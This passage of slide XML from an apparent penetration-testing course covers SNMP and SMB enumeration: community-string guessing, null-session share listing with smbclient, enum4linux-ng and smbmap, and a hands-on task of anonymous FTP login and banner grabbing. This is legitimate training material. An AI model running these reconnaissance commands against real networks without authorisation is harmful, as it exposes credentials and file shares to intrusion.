              </a:rPr>
              <a:t>Nobody patches them and nobody changes the default string.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Version 3 fixes this </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>with real authentication and encryption. Most networks still run 2c.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5074920"/>
            <a:ext cx="11091672" cy="1019747"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5380"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="5212080"/>
            <a:ext cx="10799064" cy="745427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ onesixtyone -c /usr/share/wordlists/community.txt TARGET   # find the string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ snmpwalk -v2c -c public TARGET                             # dump everything</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ snmp-check TARGET -c public                                # same, formatted nicely</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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03 / ENUMERATION</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SMB   ports 139 and 445</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30</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_smb.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6035040" cy="3922776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6903720" y="1554480"/>
            <a:ext cx="4727448" cy="3474720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This is where internal pentests are won. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>File shares hold passwords, backups, scripts and configuration files.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Null session. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Connecting with no username and no password. Old Samba and old Windows allow it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Look for readable shares first, </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>then for a writable one. Writable plus a scheduled script equals code execution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Version matters enormously. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMBv1 is what EternalBlue ate for breakfast in 2017. We come back to this.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5532120"/>
            <a:ext cx="11091672" cy="771144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7115"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="5669280"/>
            <a:ext cx="10799064" cy="496824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ smbclient -N -L //TARGET        $ enum4linux-ng -A TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ smbmap -H TARGET                $ nmap -p445 --script smb-enum-shares,smb-os-discovery TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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170A2E"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text 0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="384048"/>
            <a:ext cx="5486400" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="160" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HANDS-ON  //  TASK 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13889"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>10 min</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="749808"/>
            <a:ext cx="9144000" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Enumerate everything</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1517904"/>
            <a:ext cx="10789920" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Goal: from your port list, build a profile of the target and a file full of usernames.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2121408"/>
            <a:ext cx="11091672" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1728"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1038"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2377440"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT TO DO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2761488"/>
            <a:ext cx="10424160" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Log into FTP as anonymous and list what you can see</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Grab the SSH banner with netcat and note the exact version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>List the SMB shares without credentials, then try to open one</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
